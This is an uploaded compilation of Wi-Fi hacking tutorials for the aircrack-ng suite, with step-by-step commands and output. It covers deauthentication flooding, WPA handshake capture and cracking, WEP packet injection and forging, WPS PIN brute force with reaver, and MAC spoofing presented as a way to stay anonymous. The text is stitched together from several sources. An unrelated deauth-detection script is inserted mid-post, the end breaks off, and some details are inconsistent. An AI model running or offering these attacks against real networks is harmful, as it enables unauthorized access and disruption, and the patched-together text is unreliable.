Air Crack

The document provides a comprehensive guide on using aircrack-ng for wireless network security testing, detailing the necessary hardware, installation, and setup processes. It explains how to enable monitor mode, scan for access points, and perform attacks to capture WPA handshakes. Additionally, it covers methods for cracking captured handshakes using wordlists and brute force techniques.

Uploaded by gomezkoh06
Air crack

To use aircrack-ng you’ll need a wireless network adapter that has monitor mode and packet
injection capabilities. Feel free to do some research about your particular card and its
compatibility. There’s a good guide on the aircrack-ng site that can help you with research. You
can also do what I did and buy a cheap USB wireless adapter with these capabilities. I have
the Panda Wireless N600 and it works perfectly fine on my MacBook Pro.

Installation
If you’re not on Kali Linux, aircrack-ng is most likely available through your preferred
package manager. For Windows users, refer to the official aircrack-ng site to download the suite.

Setting up monitor mode


We’ll need to set up monitor mode in our wireless network adapter. Monitor mode allows the
wireless network interface to capture all wireless traffic. This means we’ll be able to see nearby
wireless access points and devices connected to each one.

To set the network adapter to monitor mode, first find the name of the interface as your system
detects it. You can see this using ifconfig. In my case, the interface name of my USB wireless
adapter is wlan0. I can set it to monitor mode using the following commands:

$ ifconfig wlan0 down
$ iwconfig wlan0 mode monitor
$ ifconfig wlan0 up

Now, we need to check that no processes interfere with the airmon-ng tool, which is part of
the aircrack-ng suite. To do this, run:

$ airmon-ng check wlan0


You’ll get an output similar to the following:

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
 1229 NetworkManager
 1329 wpa_supplicant
 3383 dhclient

We’ll need to kill all those processes to prevent any issues. Simply issue kill commands for
each process ID. Run airmon-ng check once again to be sure that all is well. We are now ready
to scan for access points.

Scanning for access points


To run a wireless scan using a particular interface, run the following command:

$ airodump-ng wlan0

Your terminal screen will fill up with something like this:

CH 10 ][ Elapsed: 0 s ][ 2019-09-27 21:57

BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

51:EF:63:2E:47:72  -55        0      0    0   3  -1                       <length: 0>
7C:B1:DF:B9:12:59  -42        3      0    0   7  130  WPA2  CCMP    PSK   Lower The Rent
DA:4B:77:1A:84:50  -75        2      0    0   1  195  WPA2  CCMP    PSK   Spectrum
19:7H:8D:73:97:FE  -77        2      0    0   1  195  WPA2  CCMP    PSK   MyWifi
DA:F4:AC:DC:31:A7  -75        2      0    0   1  130  WPA2  CCMP    PSK   Home
19:AD:EF:C4:0A:36  -71        3      0    0   1  195  WPA2  CCMP    PSK   Verizon
5D:19:32:EA:E0:66  -62        3      0    0   1  360  WPA2  CCMP    PSK   Cali
F5:10:4E:EA:E0:63  -62        3      0    0   1  360  WPA2  CCMP          <length: 0>
A2:72:C3:EA:E0:69  -62        3      0    0   1  360  OPN                 <length: 0>
9D:58:61:62:68:21  -63        3      0    0   1  130  WPA2  CCMP    PSK   INTERNET
ED:3D:D4:64:A4:6C  -79        2      0    0   1  65   WPA2  CCMP    PSK   OfficeJet
33:B5:E2:92:08:33  -66        4      0    0   9  260  OPN                 Test-guest

BSSID              STATION            PWR   Rate    Lost  Frames  Probe

(not associated)   88:D6:CD:88:4C:9D  -47    0 - 1     95       5
(not associated)   93:1E:44:10:82:3A  -63    0 - 1      0       2
7C:B1:DF:B9:12:59  49:12:C4:53:EF:4A  -29    0 - 1      0       1

You’ll see a list of access points and devices associated with each access point. You’ll notice
there are acronyms above each column. Here’s a list of the ones we care about and what they
mean:

- BSSID - MAC address of the access point
- PWR - Strength of the signal. The closer to 0, the better
- CH - Channel
- ESSID - Name of the access point
- STATION - Device connected to the access point (laptop, smartphone, etc.)

Now let’s select an access point and run a scan on only that particular device. We’ll capture
traffic and save it to a file. You’ll need to make note of the BSSID and channel of the access
point. In my case, my router’s ESSID is “Lower The Rent”. We’ll scan it using the following
command formula:

$ airodump-ng -c [channel number] -w [filename for output] --bssid [MAC Address of A.P.] [your interface]

In my case, the full command looks like this:

$ airodump-ng -c 7 -w SCAN_OUTPUT --bssid 7C:B1:DF:B9:12:59 wlan0

Here’s the output:

CH 7 ][ Elapsed: 24 s ][ 2019-09-27 22:05

BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

7C:B1:DF:B9:12:59  -47  100      231     92    0   7  130  WPA2  CCMP    PSK   Lower The Rent

BSSID              STATION            PWR   Rate    Lost  Frames  Probe

7C:B1:DF:B9:12:59  49:12:C4:53:EF:4A  -31   0e- 1      0     130

You’ll be able to see the access point and associated devices. This provides a much cleaner look
instead of your terminal screen being full of information. We can see that there is a single device
associated with the access point.

Now we can commence an attack.

Attacking an access point


We’ll be flooding the access point with deauthentication frames to keep devices from
reconnecting to it. As they try to reconnect, we’ll be able to capture the 4-way handshake. This
can also be used to simply perform DoS attacks on an access point. Keep in mind you won’t be
able to capture the handshake if there are no devices associated with the access point: if there
are no devices associated, there is nothing conducting the authentication process for you to
capture.

While leaving the previous airodump-ng command running in a separate tab or window, open
another tab to run the deauthentication command. The command is as follows:

$ aireplay-ng -0 0 -a 7C:B1:DF:B9:12:59 wlan0

The BSSID we specify is that of the access point. It is possible to limit the amount of
deauthentication frames to send, but in this case we are sending an infinite amount specified
with -0 0.

The output for the aireplay-ng command will look like this:

03:24:06  Waiting for beacon frame (BSSID: 7C:B1:DF:B9:12:59) on channel 7
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
03:24:06  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]
03:24:07  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]
03:24:07  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]
03:24:08  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]
03:24:08  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]
03:24:09  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]
03:24:09  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]
03:24:10  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]
03:24:10  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]
03:24:11  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]
03:24:11  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]
03:24:11  Sending DeAuth (code 7) to broadcast -- BSSID: [7C:B1:DF:B9:12:59]

Your terminal screen will continue to fill with these messages. Keep the command running until
you see a WPA handshake: XX:XX:XX:XX:XX:XX message on the upper right of the first window
running the airodump-ng command. That window will look as follows (notice the message on
the upper right):

CH 7 ][ Elapsed: 1 min ][ 2019-09-28 03:25 ][ WPA handshake: 7C:B1:DF:B9:12:59

BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID

7C:B1:DF:B9:12:59  -44   96      871     96    0   7  130  WPA2  CCMP    PSK   Lower The Rent

BSSID              STATION            PWR   Rate    Lost  Frames  Probe

7C:B1:DF:B9:12:59  49:12:C4:53:EF:4A  -41   1e- 1      0      78

If you see the message, you have successfully captured the handshake. The last step left to do
now is to crack this handshake and reveal the password in plaintext.

Cracking the password


Recall that we saved our airodump-ng scan to a file named SCAN_OUTPUT. You’ll see several
files in the directory by the same name, but you’ll only need the one with a .cap extension. From
here, there are two approaches to cracking the password. You can use a wordlist and see if one of
the passwords in the wordlist is the actual password to the access point, or you can opt to use a
program that generates passwords and attempts each one (brute forcing).

First, we’ll go over the approach using a wordlist. The command to begin cracking using a
wordlist is as follows:

$ aircrack-ng -w wordlist.txt SCAN_OUTPUT.cap

In my case, I used a short wordlist of 4800 passwords to try and crack the handshake. I was not
able to find the key, but this is what the output will look like:

                                 Aircrack-ng 1.5.2

      [00:00:00] 4800/4799 keys tested (5047.82 k/s)

      Time left: 0 seconds                                   100.02%

                           KEY NOT FOUND

      Master Key     : 8B BB 3C 7A 08 50 43 73 73 BC 27 A0 A0 20 C2 C4
                       F8 82 0E 55 32 29 28 4C 93 CD 4D C0 3E E3 9C 4C

      Transient Key  : DE 14 79 DB 14 3B ED 7A 0D 80 FC DA 67 77 5C 09
                       C7 95 27 0C AC 2A 3B 2B 08 5F B5 22 B5 F6 F7 0F
                       C5 50 68 68 85 00 1E 80 33 1B F8 D9 FE E2 5B F4
                       71 EE D0 87 E4 57 ED 21 2D 66 CC 0B A7 A7 0D 1D

      EAPOL HMAC     : 35 D8 56 95 03 0B DF 6B 48 C4 DE 21 DB 01 7F E7

The tool will go through every password in the wordlist and try to crack the access point’s
password. Wordlists are convenient and can be fast, but if the password is not in the wordlist
itself, we’ll need to try brute forcing.

There are likely several tools out there that can generate password combinations, but I
used crunch. The formula to feed passwords generated by crunch into aircrack-ng is as
follows (notice we need to specify the ESSID this time):

$ crunch [min password length] [max password length] [characters to use] | aircrack-ng -w - [filename.cap] -e [ESSID]

I already know the length of the password to my own router. My full command looks like this:

$ crunch 14 14 abcdefghijklmnopqrstuvwxyz 1234567890 | aircrack-ng -w - SCAN_OUTPUT.cap -e Lower\ The\ Rent

This will be very slow, as the program will attempt every 14-character letter and number
combination possible.

In my case, my router has the default password of pinkcoconut165. With this knowledge, I can
specify further. Instead of attempting a random mix of letters and numbers, I can test for a
specific arrangement of letters/numbers. Obviously, this would not be known if we were
attacking a completely unknown access point, but I want to demonstrate what a successful crack
looks like. Using the -t option we can specify a pattern. Here’s the description from
the man page:

-t @,%^
        Specifies a pattern, eg: @@god@@@@ where the only the @'s, ,'s, %'s,
        and ^'s will change.
        @ will insert lower case characters
        , will insert upper case characters
        % will insert numbers
        ^ will insert symbols

With this flag, we can modify our command as follows:

$ crunch 14 14 -t @@@@@@@@@@@%%% | aircrack-ng -w - SCAN_OUTPUT.cap -e Lower\ The\ Rent

This will still take long, however, due to the length of the password. Let’s cheat a little bit just to
show the success screen. Here’s the new command where we will type in the letters of the
password and only try to guess the remaining digits:

$ crunch 14 14 -t pinkcoconut%%% | aircrack-ng -w - SCAN_OUTPUT.cap -e Lower\ The\ Rent

Success! The password has been found:

                                 Aircrack-ng 1.5.2

      [00:00:03] 842 keys tested (262.68 k/s)

                       KEY FOUND! [ pinkcoconut165 ]

      Master Key     : 1C 7E B9 AE 6E 96 C3 29 A1 CC 8F 70 CE 3D 41 46
                       6A 02 A6 A3 82 E8 19 D8 34 12 E2 62 A6 79 8B C7

      Transient Key  : C1 FA BC A8 1E 15 B9 3F 7C 59 AA 00 8D 6F 9A C1
                       F8 D6 F2 A1 BB 8A 0F 71 05 D1 C0 89 88 34 04 CC
                       5A 10 EF FF 77 08 13 EF CA 8B 10 53 31 5E 65 20
                       A9 A8 25 7A 37 AA A8 A4 BD 67 6F E4 F9 36 14 C4

      EAPOL HMAC     : 92 FB C9 F7 B9 1B 60 B1 82 9B 90 BA 03 EF E4 83

Additional Tips

Changing Your MAC Address

If you want to stay as anonymous as possible, you can change your MAC Address before
attempting any of this. You can easily do this using a tool like macchanger. The following
command will assign a randomized MAC address to the wlan0 interface:

$ macchanger -r wlan0

We can be more clever and use a MAC address from a known company. The first 3 bytes of a
MAC address are known as the Organizationally Unique Identifier (OUI) and can identify the
manufacturer. For example, some of Dell’s devices have the first 3 bytes as F8:DB:88. The last 3
bytes can be anything, as long as it is within the range of A-F and 0-9 (hexadecimal values).

We can specify a MAC address with the following command:

$ macchanger -m f8:d8:88:64:fd:c7 wlan0

On MacOS you can change the MAC address of an interface to one of your choosing with the
following command:

$ sudo ifconfig wlan0 ether f8-db-88-e4-94-5d

Using this knowledge of MAC Addresses, we can also determine the manufacturers of the access
points we scan. We can look up the MAC addresses, figure out the manufacturer, and see if there
are other vulnerabilities with specific device models. Maybe we’ll discover their formula for
default passwords (which lots of people never change) to be, say, a combination of 5 letters and
5 numbers, which can help us crack the password. Any hint helps. Additionally, default ESSID
names, such as “NETGEAR23-2G”, could mean that the user never changed the default
password either ;).

Password Lists

Password lists are often used in password cracking to speed up the process. Instead of trying
every possible combination of characters, we can try our luck using leaked passwords from one
of these lists. A good place to find passwords lists and more is the SecLists GitHub repo. To start
off, I suggest trying one of the “Common Credentials” lists.

Password lists can be used along with the crunch tool we used earlier. crunch has much more
functionality that I did not dive into. I encourage you to read through the man pages and learn
more about it. It’s versatile but still easy to pick up.

Conclusions
In this post I covered how to use aircrack-ng to scan for nearby access points, capture the
4-way handshake by sending spoofed deauthentication packets, and crack the hash using crunch.
Once again, only try this on devices you own!

Scanning for wifi networks and acquiring handshakes is not too difficult. Anyone with some
command line experience can achieve this. The hardest part will be cracking the password itself
due to the processing power required.
This is an example of why long passwords are important. It is not enough to add symbols to a
short password. In fact, it is better to get into the habit of creating pass-phrases as opposed to
pass-words. A combination of words with lowercase and capital letters in addition to symbols
will be more secure than a single word with symbols. In other words, !ThisIsALongPassword123?
is much harder to crack than Password123?

There are other tools that we could have used to crack the password, such as hashcat. If I’m not
mistaken, hashcat can take advantage of a GPU which will allow you to crack passwords much
faster. However, I wanted to focus on the tools that come with the aircrack-ng suite.

This concludes my wifi hacking notes, I hope you learned something!

© 2022 Nelson Figueroa | 512kb.club | 1mb.club

Cracking WIFI Passwords with Aircrack-ng Suite.



This writing focuses entirely on practical ways of cracking passwords, encryption types, and how
to brute force WiFi networks.

All practices should be done in a safe environment, and this is fully intended for educational
purposes. Depending on the hardware configuration and other external conditions you may piss
off someone, and that’s not the point of this, so be cool and be aware that this can be harmful
and illegal.

For this practice, I used a Kali Linux 2014.4 64-bit OS on a regular VirtualBox machine and a
TP-LINK TL-WN321G WiFi dongle that emulates a physical wireless card on the virtualized OS.

Great! We are going to crack the passwords of a WiFi network, but what is a network?

The main concept of a network comes down to devices connected together in order to transfer
data or share resources between them.

In a simple network topology, at least one element acts as a server, and this element is mainly
responsible for handling, holding, and sharing data across the network (in most cases). You can
already figure out which element I’m talking about; it’s not that hard. The server is the router
and the data is the Internet.

In simple words: the only device connected to the Internet is the router, and the other clients
of the network connect to it to get the shared data (Internet access).

A client sends a request to the router, the request goes out to the Internet, and the response
data packets come back through the router to the client.

Where:

- The request and response are network packets

- We can see the information transferred, using sniffers to capture and read it

Enough theory, let’s start cracking

Before using the Aircrack suite, we have to take a look at the role of the MAC address and how
to spoof it. Let’s protect our identity a little bit.

Each network card has a physical static address assigned by the card manufacturer, called the
MAC (Media Access Control) address. This address is used between devices to identify each
other and to transfer packets to the right place. Each packet contains a source MAC and a
destination MAC for identification.

This also applies to taking actions on a single device, things like restrictions and more
(whitelists, blacklists, etc.).

Fortunately, Kali has a CLI tool called macchanger that can change the value of the MAC address
stored in the RAM memory of the OS.

So, we can check for the connected physical network interfaces with the command iwconfig. This
command will display the network interfaces connected to the machine; we are going to use the
wlan0 interface.

Now, finally, let’s change the MAC address of the wlan0 interface, by shutting down the
interface and running the macchanger tool:

ifconfig wlan0 down
macchanger --random wlan0
ifconfig wlan0 up

ifconfig was replaced in newer Kali Linux versions, so now we have to use the following:

ip link set wlan0 down
macchanger --random wlan0
ip link set wlan0 up

Resulting in something like this:

Current MAC:   ca:79:9c:99:58:1a (unknown)
Permanent MAC: f8:d1:11:14:dd:cc (TP-LINK TECHNOLOGIES CO., LTD.)
New MAC:       1e:92:CD:37:69:12 (unknown)

I previously said that the MAC address is there to ENSURE that each packet gets delivered to the
right place, so how is it possible to capture packets that are not addressed to our MAC?

Well, this is because the wireless card (interface) has two modes: managed mode and monitor
mode.

The managed mode

This is the default behavior; it ensures that packets are captured only if the destination MAC
is our MAC address. Simply put, this gets every packet addressed to me (me = my computer).

The monitor mode

This mode will capture ANY packet within WiFi range, whether directed at us or not.

Enabling monitor

Almost every configuration change has to be done while the interface is down, so we have to
shut down the wlan0 interface in order to do that.

First of all, shut down the interface with: ip link set wlan0 down

And FINALLY, we are going to use the first program from the Aircrack-ng suite, airodump-ng.

Sniffing with Airodump-ng

This program is a packet sniffer that allows capturing all the packets within our WiFi card’s
range. Basically, it scans all the WiFi networks around us and gathers information about them.
But first, we need to run the following command:

airmon-ng start wlan0

Airmon-ng will create a new virtual wireless card called wlan0mon with monitor mode enabled.
This interface will be used in all the follow-up practices.

You can also shut down the monitor interface using the stop
command, just like this:

airmon-ng stop wlan0mon

We just finished our setup; the WiFi card is ready to start sniffing.

So, by using:

airodump-ng wlan0mon

The program will start sniffing and will display a table listing networks and connected devices
with the following information:

BSSID -> MAC address of the access point (network device)
PWR -> Power (signal strength, which reflects the distance between the access point and the WiFi card). The closer the network, the faster the attack
BEACON -> heartbeat-like packets
#DATA -> useful packets sniffed
#/s -> number of data packets collected in the last 10 seconds
CH -> broadcast channel (no interference)
MB -> Speed
ENC -> Encryption
CIPHER -> Cipher used (CCMP, TKIP)
AUTH -> Authentication type

This will display all the networks and all the peripherals connected to them, identified by their
MAC addresses. But we can narrow it down by pointing the sniffer at one or more specific
networks.

Targeted Sniffing

Airodump-ng will be the core command for all the sniffing


processes. Targeting packets is accomplished by adding flags
to the airodump-ng command

Check this example:

airodump-ng --channel 11 --bssid B4:75:0E:A6:16:01 --write davidfile.txt wlan0mon

This restricts the capture to the network with the specified MAC address. It will also create
and write a file through the --write option, using the monitor mode interface. For this scan I
used the .txt output file extension, but if you don’t specify one, the program will produce a
bunch of files with some less familiar extensions like .cap or .netxml.

We can analyze this data using Wireshark, but bear in mind that the collected data will not be
of much use if the target network uses encryption.

I previously said that airodump-ng displays all the peripherals, right? Well, it shows the
stations (computers) present on the network with stats such as:

STATION -> MAC address of the client
PWR -> Distance between the interface and the client’s computer
LOST -> packets lost
FRAMES -> useful packets

With a target network determined, it is much easier to start sending attacks to the network,
depending on its encryption type and distance.

DeAuthentication Attacks

This attack is used to disconnect any device from a network within our range, even if the
network is protected with a key: the hacker sends de-authentication packets to the router
pretending to be the target machine (spoofing its MAC address).

At the same time, the hacker sends packets to the target machine (pretending to be the router)
telling it that it needs to re-authenticate itself.

This time we are going to use the aireplay-ng program of the aircrack-ng suite:

aireplay-ng --deauth 200 --channel 11 -a B4:75:0E:A6:16:01 wlan0mon

This will apply to all the clients connected to the network, but we can also specify a target
client MAC with the -c flag.

It’s easy.
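The flip side of the deauthentication commands in this section and in the aireplay-ng -0 section of the first post is that the flood is easy to spot on the air: a legitimate deauth is a single frame to one client, while aireplay-ng emits a burst of "DeAuth (code 7) to broadcast" frames every second. The following added example, which is not code from either post, parses raw 802.11 management frames and flags any BSSID that exceeds a per-second deauth threshold; the sample frames, the one-second window and the threshold of 10 are constructed assumptions.

```python
"""Flag 802.11 deauthentication floods in a capture (added example, not from the posts).

Assumptions: frames arrive as (timestamp_ms, raw_bytes) pairs with the 802.11 header at
offset 0 (no radiotap header); the window and threshold below are illustrative values.
"""
import struct
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
FC_DEAUTH = 0xC0  # frame control byte 0: version 0, type 0 (management), subtype 12 (deauth)


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


def build_deauth(bssid: str, dst: str, reason: int, seq: int = 0) -> bytes:
    """Constructed sample frame: 24-byte management header + little-endian reason code.
    Addr1 = destination, Addr2 = source (the AP), Addr3 = BSSID, then the sequence control."""
    header = struct.pack("<BBH6s6s6sH", FC_DEAUTH, 0x00, 0,
                         mac_bytes(dst), mac_bytes(bssid), mac_bytes(bssid), seq << 4)
    return header + struct.pack("<H", reason)


def parse_deauth(raw: bytes):
    """Return (dst, src, bssid, reason_code) for a deauth frame, or None for anything else."""
    if len(raw) < 26:
        return None
    fc0 = raw[0]
    frame_type = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    if frame_type != 0 or subtype != 12:
        return None
    return (mac_str(raw[4:10]), mac_str(raw[10:16]), mac_str(raw[16:22]),
            struct.unpack_from("<H", raw, 24)[0])


def detect_deauth_floods(capture, window_ms: int = 1000, threshold: int = 10) -> dict:
    """Sliding-window count of deauth frames per BSSID.

    Returns {bssid: {"peak": n, "broadcast": bool, "reasons": set}} for every BSSID that
    exceeded `threshold` deauths inside any `window_ms` span. One deauth to a single client
    with reason 3 (station leaving) is normal; dozens per second to broadcast are not.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, raw in capture:
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        dst, _src, bssid, reason = parsed
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window_ms:
            q.popleft()
        if len(q) > threshold:
            entry = alerts.setdefault(bssid, {"peak": 0, "broadcast": False, "reasons": set()})
            entry["peak"] = max(entry["peak"], len(q))
            entry["broadcast"] = entry["broadcast"] or dst == BROADCAST
            entry["reasons"].add(reason)
    return alerts


def sample_capture():
    """Constructed sample: 30 broadcast deauths (reason 7) in 3 s from one BSSID, mirroring
    the aireplay-ng output above, plus one ordinary deauth and one beacon from elsewhere."""
    frames = [(100 * i, build_deauth("7c:b1:df:b9:12:59", BROADCAST, 7, seq=i))
              for i in range(30)]
    frames.append((1500, build_deauth("da:4b:77:1a:84:50", "49:12:c4:53:ef:4a", 3, seq=1)))
    frames.append((2000, b"\x80\x00" + b"\x00" * 30))  # beacon (subtype 8): ignored by the parser
    frames.sort(key=lambda f: f[0])
    return frames


if __name__ == "__main__":
    for bssid, info in detect_deauth_floods(sample_capture()).items():
        print(f"ALERT {bssid}: peak {info['peak']} deauths per window, "
              f"broadcast={info['broadcast']}, reason codes={sorted(info['reasons'])}")
```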

To this point

We have been using a virtual network card. All the previous attacks can be done without
connecting to the target network, but we can get more accurate information if we connect to it.

For this, if it’s an open network then we can just connect to it without a password; on the
other hand, if the target network uses a key, we will need to decrypt packets.
The common encryption types are WEP, WPA, and of course WPA2; the cracking methods vary
according to the encryption type and, of course, the combination of hardware and the distance to
the target station or router. The complexity of each encryption type increases from WEP to
WPA2.

Let’s start reviewing the attacks to the WEP encryption type.

Cracking the WEP Encryption

In a basic case, we have to take a look at the sniffing process of WEP networks using
airodump-ng with the monitor mode interface.

For this lecture, we will refer to the router as an AP (Access Point).

[With the sniffing process running]

aircrack-ng filename.cap will do the trick.

Once we get the key, the sniffing process can stop and we will have the WEP key for
authenticating to the target network.

Fake Authentication (Packet Injection)

This particular method is a common rallying point for scenarios where you don’t have enough
packets to perform the attack.

We have two scenarios. For the first one, let’s imagine an AP (Access Point) with clients
connected and regular Internet usage (no videos, basically). The second one is when there are no
stations on the network. The first case will not require additional actions, but the second one
will need packets injected into the traffic in order to force the router to create new packets
with new IVs.

aireplay-ng --fakeauth 100 -a 00:18:F8:BD:5C:F3 -h F8:D1:11:14:DD:CC wlan0mon

Where:

1. --fakeauth (command) with X packet requests

2. -a: target BSSID

3. -h: local spoofed MAC address

If the authentication is granted, the value under the AUTH column (in the table) will change to
OPN, and the output will look something like this:

17:42:39  Waiting for beacon frame (BSSID: 00:18:F8:BD:5C:F3) on channel 6
17:42:39  Sending Authentication Request (Open System)
17:42:41  Sending Authentication Request (Open System)
17:42:43  Sending Authentication Request (Open System)
17:42:45  Sending Authentication Request (Open System) [ACK]
17:42:47  Sending Authentication Request (Open System) [ACK]
17:44:40  Authentication successful
17:44:40  Sending Association Request [ACK]
17:44:40  Association successful :-) (AID: 1)

This method waits for an ARP packet, captures it and injects it back into the traffic.

It consists of forcing the access point to generate a new ARP packet with a new IV; we capture
this new packet and inject it into the traffic again, and this has to be repeated until the
number of packets is sufficient to crack the key.

Before doing it you should be writing a .cap file with the Aircrack suite and have successfully
associated and authenticated to the target network.

aireplay-ng --arpreplay 100 -b 00:18:F8:BD:5C:F3 -h F8:D1:11:14:DD:CC wlan0mon

Where:

1. --arpreplay (command) with X packet requests

2. -b = target BSSID

3. -h = local spoofed MAC address

Korek Chop Chop (Packet Injection)

This is another way to increase the packet count on very low traffic networks in order to
recover the key.

Basically, in this method we capture an ARP packet, attempt to guess its keystream and use it to
forge a new packet with packetforge-ng, and then inject this new forged packet into the traffic
to generate new IVs. This is a little bit hard to get right on the first try, at least for me.

Using this command:

aireplay-ng --chopchop -b [target MAC] -h [your MAC] [INTERFACE]

If we break down what this command does, we get the following actions:

- grab a bunch of packets (stream) and ask whether to decrypt -> Y/N

- save the chosen packets in a .cap file

- start guessing and determining the keystream for the target AP (xor, pt, frames, etc.) with a
resulting percentage

But, how to forge a packet? Well:

packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [file.xor] -w [output]

-0 -> for ARP packets
-k destination IP
-l source IP
-y specify the name of the keystream (.xor) file
-w output file for the forged packet

And then, we inject the forged packet to generate new IVs, with a previous authentication:

aireplay-ng -2 -r [forged packet file from packetforge-ng] [interface]

Fragmentation Attack

This attack is pretty similar to the Korek Chop Chop method.

You will obtain the PRGA with this command:

aireplay-ng --fragment -b [target MAC] -h [your MAC] [interface]

What does this do? It tries to generate a useful packet, repeatedly. Once it starts being
useful, we are going to use the keystream for forging packets with the .xor file.

Forging the packet is the same as with chopchop, but with the --fragment flag, and later we
inject the forged packet into the traffic like this:

aireplay-ng -2 -r [output from last step] [interface]

The last two methods are not quite simple; you can practice by using a terminal multiplexer in
order to reproduce each step easily. Also, bear in mind that every piece of hardware is
different and sometimes it won’t be possible to implement one or more of the techniques.

Now, let’s review the WPA and WPA2 cracking methods.

WPA Cracking

WPA was designed to address the issues in WEP and provide better encryption.

The main issue in WEP is the short IV (initialization vector) sent as plain text, so IVs can
repeat; therefore, by collecting a large number of IVs, with Aircrack-ng we can determine the
keystream and the WEP key.

In WPA each packet is encrypted with a unique temporary key, so the number of data packets we
collect is irrelevant. They do not contain information for cracking WPA keys.

WPA/ WPA2 Cracking (WPS Feature)

Most of the packets contain useless information for cracking (determining the key).

WPS Feature

WPS is a feature that allows users to connect to WPS-enabled networks easily, using a WPS
button or just by clicking the WPS functionality, where a client will connect to the network
without entering the WPA key manually.

Authentication is done using an 8-digit PIN (not the WPA key). This means that there is a
relatively small number of PIN combinations, and using brute force we can guess the PIN in less
than 10 hours.

For this, we are going to use a tool called “ reaver”, this tool
can recover the WPA/WPA2 key from the pin.

Getting WPA networks with Wash

Using the monitor interface, let’s grab the WPA networks. Usually, the wash CLI tool is not
installed on Kali, but you can find it on the Kali Linux Tools site.

wash -i wlan0mon

Resulting:

BSSID - MAC address
Channel - WiFi channel
WPS version - 1.0
RSSI - distance (signal strength)
WPS Locked - No => Sometimes it can be locked; if yes, you can't do this attack
ESSID - [network name]

And then, we can use reaver like this:

reaver -b [target MAC] -c [CHANNEL] -i [Interface monitor]

This is quite simple, but by the time I was practicing, there were some theoretical doubts I
wasn’t clear on at all.

Let’s recap again:

Capturing WPA packets is not that useful, as they do not contain any info that can be used to
crack the key.

But some packets do contain useful information: these are called handshake packets.

OK, but how does it work?

Every time you connect to any AP, a 4-way handshake occurs between the client and the AP (4
packets exchanged while connecting to the target network). We need to capture the handshake and
then, with aircrack, launch a wordlist attack against the handshake to determine the key.

Damn …

Again, for cracking WPA/WPA2 we need to capture the handshake and then brute force it through
a wordlist or a text dictionary.

Capturing Handshake (Step by Step)

First, let’s run airodump-ng on the specific AP target:

airodump-ng --channel [channel] --bssid [AP] --write [file] [interface]

Then, we need to force the handshake; this is possible by forcing a de-auth or a simple network
reconnection.

aireplay-ng --deauth [4] -a [AP] -c [target] [interface]

PRO TIP: While you are doing this, pay attention to the message in the top right corner; it
should say WPA Handshake or something like [WPA Handshake: 00:10:18:90:2D:EE]

Creating a Word List

Great, you already have the AP handshake detected; now we will use Kali’s crunch tool, which
generates a wordlist, or you can download a professional one from the Internet. This step
builds a brute-force style list that Aircrack will use to crack the WPA key.

./crunch [min] [max] [characters=lower|upper|numbers|symbols] -t [pattern] -o file (output file)

This is an example of conditioning

./crunch 6 8 12356!"&$% -o wordlist -t a@@@@b -> chars between a and

And now, let’s use the freaking word list

Using aircrack-ng to crack the key. For each password in the wordlist, aircrack-ng combines it with the network name (ESSID) to compute a Pairwise Master Key (PMK) with PBKDF2-HMAC-SHA1 (4096 iterations).

The PMK itself is not in the capture. Instead, aircrack-ng derives the session key from the PMK plus the MAC addresses and nonces found in the handshake, recomputes the handshake's message integrity code (MIC), and compares it with the captured one. A match means the candidate is the passphrase.

aircrack-ng -w [wordlist] -b [AP MAC] [handshake .cap file]

Then wait. How long it takes depends mostly on the size of the wordlist and your CPU.

I'm pretty sure there are more common attacks against this vulnerable encryption, with more sophisticated ways of performing them. Let's keep this Gist updated.
Happy coding.


Aircrack-ng is a Wi-Fi security auditing suite for 802.11 WEP and WPA/WPA2-PSK networks. It can crack WEP and WPA/WPA2-PSK keys and thereby gain access to a network, and it is used by learners and security professionals to test the security and reliability of wireless networks.

It can be installed by using the following command on the terminal:

sudo apt-get install aircrack-ng


The attacks range from disconnecting clients (deauthentication) to capturing handshakes to cracking passwords. Only perform them against networks you own or have the owner's explicit consent to test.

The first thing we need to successfully attack or audit a network is a Wi-Fi adapter that supports monitor mode and packet injection. The reason an external adapter is usually needed is that most built-in adapters that ship with a PC do not support monitor mode or injection. Monitor mode lets the adapter capture every 802.11 frame on a channel, including traffic between other stations, without associating to an access point.

Cracking WEP
WEP (Wired Equivalent Privacy) is the original Wi-Fi security protocol; its intention was to provide data confidentiality comparable to that of a traditional wired network. The flaw we are targeting is the Initialisation Vector (IV), which is only 24 bits long. WEP uses a 64-bit or 128-bit RC4 key made up of the 24-bit IV and a 40-bit or 104-bit shared key. The short keys weaken the encryption, RC4 is deprecated, and the way WEP builds the per-packet key (the IV concatenated directly with the shared key, with the IV sent in the clear) gives attackers a detectable pattern.

- Each packet is encrypted by XORing it with an RC4 keystream.
- The keystream is generated from the IV and the shared key: RC4(IV || key) = keystream.
